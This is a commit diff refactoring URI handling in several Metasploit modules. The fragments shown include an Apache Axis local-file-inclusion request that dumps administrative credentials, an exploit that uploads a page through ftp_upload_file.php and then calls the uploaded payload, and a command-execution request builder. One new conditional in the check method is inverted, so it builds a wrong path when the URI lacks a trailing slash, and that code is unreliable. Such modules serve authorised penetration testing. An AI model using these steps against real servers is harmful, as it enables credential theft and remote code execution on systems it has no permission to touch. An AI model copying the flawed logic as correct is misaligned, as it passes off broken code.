Various and sundry fixes for normalize_uri
parent
6a9445966a
commit
36adf86184
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
get_credentials(new_uri)
|
||||
|
||||
else
|
||||
print_status("#{uri} - Apache Axis - The remote page not accessible")
|
||||
print_status("#{target_url} - Apache Axis - The remote page not accessible")
|
||||
return
|
||||
|
||||
end
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "#{uri}" + lfi_payload,
|
||||
}, 25)
|
||||
|
||||
print_status("#{uri} - Apache Axis - Dumping administrative credentials")
|
||||
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
|
||||
|
||||
if (res and res.code == 200)
|
||||
if res.body.to_s.match(/axisconfig/)
|
||||
|
|
|
@ -65,7 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
if uri[-1,1] != '/'
|
||||
uri = uri + "index.php"
|
||||
else
|
||||
uri = uri + "/index.php"
|
||||
end
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => uri
|
||||
|
@ -88,7 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def retrieve_session(user, pass)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
if uri[-1,1] == "/"
|
||||
uri = uri + "login.php"
|
||||
else
|
||||
uri = uri + "/login.php"
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
|
@ -114,7 +122,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def upload_page(session, newpage, contents)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
if uri[-1,1] == "/"
|
||||
uri = uri + "ftp_upload_file.php"
|
||||
else
|
||||
uri = uri + "/ftp_upload_file.php"
|
||||
end
|
||||
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
|
||||
|
@ -176,7 +188,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Calling payload: #{cmdpath}")
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
if uri[-1,1] == "/"
|
||||
uri = uri + cmdpath
|
||||
else
|
||||
uri = uri + "/#{cmdpath}"
|
||||
end
|
||||
|
||||
send_request_raw({
|
||||
'uri' => uri
|
||||
|
|
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
uri =normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = Rex::Text::uri_encode(uri)
|
||||
var_a = rand_text_alpha_lower(4)
|
||||
var_b = rand_text_alpha_lower(2)
|
||||
|
|
Loading…
Reference in New Issue